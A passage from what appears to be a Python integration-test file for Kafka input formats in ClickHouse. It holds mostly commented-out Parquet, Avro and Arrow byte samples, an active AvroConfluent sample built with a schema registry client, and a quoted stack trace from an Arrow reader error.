x18\x04\x01\x00\x00\x00\x00\x00\x00\x15\x02\x19\x6c\x35\x00\x18\x06\x73\x63\x68\x65\x6d\x61\x15\x0a\x00\x15\x04\x25\x00\x18\x02\x69\x64\x00\x15\x02\x25\x00\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x25\x18\x4c\xac\x13\x10\x12\x00\x00\x00\x15\x0c\x25\x00\x18\x04\x76\x61\x6c\x31\x25\x00\x4c\x1c\x00\x00\x00\x15\x08\x25\x00\x18\x04\x76\x61\x6c\x32\x00\x15\x02\x25\x00\x18\x04\x76\x61\x6c\x33\x25\x16\x4c\xac\x13\x08\x12\x00\x00\x00\x16\x1e\x19\x1c\x19\x5c\x26\xca\x02\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x1e\x16\x9e\x03\x16\xc2\x02\x26\xb8\x01\x26\x08\x1c\x18\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x26\xd8\x04\x1c\x15\x02\x19\x35\x04\x00\
x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\x8c\x04\x26\xe4\x03\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x26\xb2\x06\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x1e\x16\x68\x16\x70\x26\xee\x05\x26\xc2\x05\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x26\x9a\x08\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x1e\x16\x84\x01\x16\x8c\x01\x26\xb6\x07\x26\x8e\x07\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x26\x8e\x0a\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\xc2\x09\x26\x9a\x09\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x16\xa6\x06\x16\x1e\x00\x28\x22\x70\x61\x72\x71\x75\x65\x74\x2d\x63\x70\x70\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x31\x2e\x35\x2e\x31\x2d\x53\x4e\x41\x50\x53\x48\x4f\x54\x19\x5c\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x00\xc5\x01\x00\x00\x50\x41\x52\x31',
# # b'\x50\x41\x52\x31\x15\x04\x15\x10\x15\x14\x4c\x15\x02\x15\x04\x12\x00\x00\x08\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x0c\x15\x10\x4c\x15\x02\x15\x04\x12\x00\x00\x06\x14\x02\x00\x00\x00\x41\x4d\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x03\x08\x01\x02\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\xb2\x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x3f\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x03\x08\x01\x02\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x01\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x15\x02\x19\x6c\x35\x00\x18\x06\x73\x63\x68\x65\x6d\x61\x15\x0a\x00\x15\x04\x25\x00\x18\x02\x69\x64\x00\x15\x02\x25\x00\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x25\x18\x4c\xac\x13\x10\x12\x00\x00\x00\x15\x0c\x25\x00\x18\x04\x76\x61\x6c\x31\x25\x00\x4c\x1c\x00\x00\x00\x15\x08\x25\x00\x18\x04\x76\x61\x6c\x32\x00\x15\x02\x25\x00\x18\x04\x76\x61\x6c\x33\x25\x16\x4c\xac\x13\x08\x12\x00\x00\x00\x16\x02\x19\x1c\x19\x5c\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\
xb2\x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x16\x98\x05\x16\x02\x00\x28\x22\x70\x61\x72\x71\x75\x65\x74\x2d\x63\x70\x70\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x31\x2e\x35\x2e\x31\x2d\x53\x4e\x41\x50\x53\x48\x4f\x54\x19\x5c\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x00\xc4\x01\x00\x00\x50\x41\x52\x31',
# # ''
# # ],
# },
# 'Avro' : {
# 'data_sample' : [
# b'\x4f\x62\x6a\x01\x04\x16\x61\x76\x72\x6f\x2e\x73\x63\x68\x65\x6d\x61\x82\x03\x7b\x22\x74\x79\x70\x65\x22\x3a\x22\x72\x65\x63\x6f\x72\x64\x22\x2c\x22\x6e\x61\x6d\x65\x22\x3a\x22\x72\x6f\x77\x22\x2c\x22\x66\x69\x65\x6c\x64\x73\x22\x3a\x5b\x7b\x22\x6e\x61\x6d\x65\x22\x3a\x22\x69\x64\x22\x2c\x22\x74\x79\x70\x65\x22\x3a\x22\x6c\x6f\x6e\x67\x22\x7d\x2c\x7b\x22\x6e\x61\x6d\x65\x22\x3a\x22\x62\x6c\x6f\x63\x6b\x4e\x6f\x22\x2c\x22\x74\x79\x70\x65\x22\x3a\x22\x69\x6e\x74\x22\x7d\x2c\x7b\x22\x6e\x61\x6d\x65\x22\x3a\x22\x76\x61\x6c\x31\x22\x2c\x22\x74\x79\x70\x65\x22\x3a\x22\x73\x74\x72\x69\x6e\x67\x22\x7d\x2c\x7b\x22\x6e\x61\x6d\x65\x22\x3a\x22\x76\x61\x6c\x32\x22\x2c\x22\x74\x79\x70\x65\x22\x3a\x22\x66\x6c\x6f\x61\x74\x22\x7d\x2c\x7b\x22\x6e\x61\x6d\x65\x22\x3a\x22\x76\x61\x6c\x33\x22\x2c\x22\x74\x79\x70\x65\x22\x3a\x22\x69\x6e\x74\x22\x7d\x5d\x7d\x14\x61\x76\x72\x6f\x2e\x63\x6f\x64\x65\x63\x08\x6e\x75\x6c\x6c\x00\x8d\x1f\xf2\x17\x71\xa4\x2e\xe4\xc9\x0a\x23\x67\x12\xaa\xc6\xc0\x02\x14\x00\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\x8d\x1f\xf2\x17\x71\xa4\x2e\xe4\xc9\x0a\x23\x67\x12\xaa\xc6\xc0',
# b'\x4f\x62\x6a\x01\x04\x16\x61\x76\x72\x6f\x2e\x73\x63\x68\x65\x6d\x61\x82\x03\x7b\x22\x74\x79\x70\x65\x22\x3a\x22\x72\x65\x63\x6f\x72\x64\x22\x2c\x22\x6e\x61\x6d\x65\x22\x3a\x22\x72\x6f\x77\x22\x2c\x22\x66\x69\x65\x6c\x64\x73\x22\x3a\x5b\x7b\x22\x6e\x61\x6d\x65\x22\x3a\x22\x69\x64\x22\x2c\x22\x74\x79\x70\x65\x22\x3a\x22\x6c\x6f\x6e\x67\x22\x7d\x2c\x7b\x22\x6e\x61\x6d\x65\x22\x3a\x22\x62\x6c\x6f\x63\x6b\x4e\x6f\x22\x2c\x22\x74\x79\x70\x65\x22\x3a\x22\x69\x6e\x74\x22\x7d\x2c\x7b\x22\x6e\x61\x6d\x65\x22\x3a\x22\x76\x61\x6c\x31\x22\x2c\x22\x74\x79\x70\x65\x22\x3a\x22\x73\x74\x72\x69\x6e\x67\x22\x7d\x2c\x7b\x22\x6e\x61\x6d\x65\x22\x3a\x22\x76\x61\x6c\x32\x22\x2c\x22\x74\x79\x70\x65\x22\x3a\x22\x66\x6c\x6f\x61\x74\x22\x7d\x2c\x7b\x22\x6e\x61\x6d\x65\x22\x3a\x22\x76\x61\x6c\x33\x22\x2c\x22\x74\x79\x70\x65\x22\x3a\x22\x69\x6e\x74\x22\x7d\x5d\x7d\x14\x61\x76\x72\x6f\x2e\x63\x6f\x64\x65\x63\x08\x6e\x75\x6c\x6c\x00\xeb\x9d\x51\x82\xf2\x11\x3d\x0b\xc5\x92\x97\xb2\x07\x6d\x72\x5a\x1e\xac\x02\x02\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\x04\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\x06\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\x08\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\x0a\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\x0c\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\x0e\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\x10\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\x12\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\x14\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\x16\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\x18\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\x1a\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\x1c\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\x1e\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\xeb\x9d\x51\x82\xf2\x11\x3d\x0b\xc5\x92\x97\xb2\x07\x6d\x72\x5a',
# b'\x4f\x62\x6a\x01\x04\x16\x61\x76\x72\x6f\x2e\x73\x63\x68\x65\x6d\x61\x82\x03\x7b\x22\x74\x79\x70\x65\x22\x3a\x22\x72\x65\x63\x6f\x72\x64\x22\x2c\x22\x6e\x61\x6d\x65\x22\x3a\x22\x72\x6f\x77\x22\x2c\x22\x66\x69\x65\x6c\x64\x73\x22\x3a\x5b\x7b\x22\x6e\x61\x6d\x65\x22\x3a\x22\x69\x64\x22\x2c\x22\x74\x79\x70\x65\x22\x3a\x22\x6c\x6f\x6e\x67\x22\x7d\x2c\x7b\x22\x6e\x61\x6d\x65\x22\x3a\x22\x62\x6c\x6f\x63\x6b\x4e\x6f\x22\x2c\x22\x74\x79\x70\x65\x22\x3a\x22\x69\x6e\x74\x22\x7d\x2c\x7b\x22\x6e\x61\x6d\x65\x22\x3a\x22\x76\x61\x6c\x31\x22\x2c\x22\x74\x79\x70\x65\x22\x3a\x22\x73\x74\x72\x69\x6e\x67\x22\x7d\x2c\x7b\x22\x6e\x61\x6d\x65\x22\x3a\x22\x76\x61\x6c\x32\x22\x2c\x22\x74\x79\x70\x65\x22\x3a\x22\x66\x6c\x6f\x61\x74\x22\x7d\x2c\x7b\x22\x6e\x61\x6d\x65\x22\x3a\x22\x76\x61\x6c\x33\x22\x2c\x22\x74\x79\x70\x65\x22\x3a\x22\x69\x6e\x74\x22\x7d\x5d\x7d\x14\x61\x76\x72\x6f\x2e\x63\x6f\x64\x65\x63\x08\x6e\x75\x6c\x6c\x00\x73\x65\x4f\x7c\xd9\x33\xe1\x18\xdd\x30\xe8\x22\x2a\x58\x20\x6f\x02\x14\x00\x00\x04\x41\x4d\x00\x00\x00\x3f\x02\x73\x65\x4f\x7c\xd9\x33\xe1\x18\xdd\x30\xe8\x22\x2a\x58\x20\x6f',
# ],
# },
'AvroConfluent': {
'data_sample': [
avro_confluent_message(cluster.schema_registry_client,
{'id': 0, 'blockNo': 0, 'val1': 'AM', 'val2': 0.5, 'val3': 1}),
b''.join([avro_confluent_message(cluster.schema_registry_client,
{'id': msg_id, 'blockNo': 0, 'val1': 'AM', 'val2': 0.5, 'val3': 1})
for msg_id in range(1, 16)]),
avro_confluent_message(cluster.schema_registry_client,
{'id': 0, 'blockNo': 0, 'val1': 'AM', 'val2': 0.5, 'val3': 1}),
],
'extra_settings': ", format_avro_schema_registry_url='http://{}:{}'".format(
cluster.schema_registry_host,
cluster.schema_registry_port
),
'supports_empty_value': True,
},
# 'Arrow' : {
# # Not working at all: DB::Exception: Error while opening a table: Invalid: File is too small: 0, Stack trace (when copying this message, always include the lines below):
# # /src/Common/Exception.cpp:37: DB::Exception::Exception(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&, int) @ 0x15c2d2a3 in /usr/bin/clickhouse
# # /src/Processors/Formats/Impl/ArrowBlockInputFormat.cpp:88: DB::ArrowBlockInputFormat::prepareReader() @ 0x1ddff1c3 in /usr/bin/clickhouse
# # /src/Processors/Formats/Impl/ArrowBlockInputFormat.cpp:26: DB::ArrowBlockInputFormat::ArrowBlockInputFormat(DB::ReadBuffer&, DB::Block const&, bool) @ 0x1ddfef63 in /usr/bin/clickhouse
# # /contrib/libcxx/include/memory:2214: std::__1::__compressed_pair_elem<DB::ArrowBlockInputFormat, 1, false>::__compressed_pair_elem<DB::ReadBuffer&, DB::Block const&, bool&&, 0ul, 1ul, 2ul>(std::__1::piecewise_construct_t, std::__1::tuple<DB::ReadBuffer&, DB::Block const&, bool&&>, std::__1::__tuple_indices<0ul, 1ul, 2ul>) @ 0x1de0470f in /usr/bin/clickhouse
# # /contrib/libcxx/include/memory:2299: std::__1::__compressed_pair<std::__1::allocator<DB::ArrowBlockInputFormat>, DB::ArrowBlockInputFormat>::__compressed_pair<std::__1::allocator<DB::ArrowBlockInputFormat>&, DB::ReadBuffer&, DB::Block const&, bool&&>(std::__1::piecewise_construct_t, std::__1::tuple<std::__1::allocator<DB::ArrowBlockInputFormat>&>, std::__1::tuple<DB::ReadBuffer&, DB::Block const&, bool&&>) @ 0x1de04375 in /usr/bin/clickhouse
# # /contrib/libcxx/include/memory:3569: std::__1::__shared_ptr_emplace<DB::ArrowBlockInputFormat, std::__1::allocator<DB::ArrowBlockInputFormat> >::__shared_ptr_emplace<DB::ReadBuffer&, DB::Block const&, bool>(std::__1::allocator<DB::ArrowBlockInputFormat>, DB::ReadBuffer&, DB::Block const&, bool&&) @ 0x1de03f97 in /usr/bin/clickhouse
# # /contrib/libcxx/include/memory:4400: std::__1::enable_if<!(is_array<DB::ArrowBlockInputFormat>::value), std::__1::shared_ptr<DB::ArrowBlockInputFormat> >::type std::__1::make_shared<DB::ArrowBlockInputFormat, DB::ReadBuffer&, DB::Block const&, bool>(DB::ReadBuffer&, DB::Block const&, bool&&) @ 0x1de03d4c in /usr/bin/clickhouse
# # /src/Processors/Formats/Impl/ArrowBlockInputFormat.cpp:107: DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_0::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) const @ 0x1de010df in /usr/bin/clickhouse
# 'data_sample' : [
# '\x41\x52\x52\x4f\x57\x31\x00\x00\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x10\x00\x00\x00\x0c\x00\x14\x00\x06\x00\x08\x00\x0c\x00\x10\x00\x0c\x00\x00\x00\x00\x00\x03\x00\x3c\x00\x00\x00\x28\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x58\x01\x00\x00\x00\x00\x00\x00\x60\x01\x00\x00\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00
\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\x78\x01\x00\x00\x41\x52\x52\x4f\x57\x31',
# '\x41\x52\x52\x4f\x57\x31\x00\x00\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x48\x01\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x0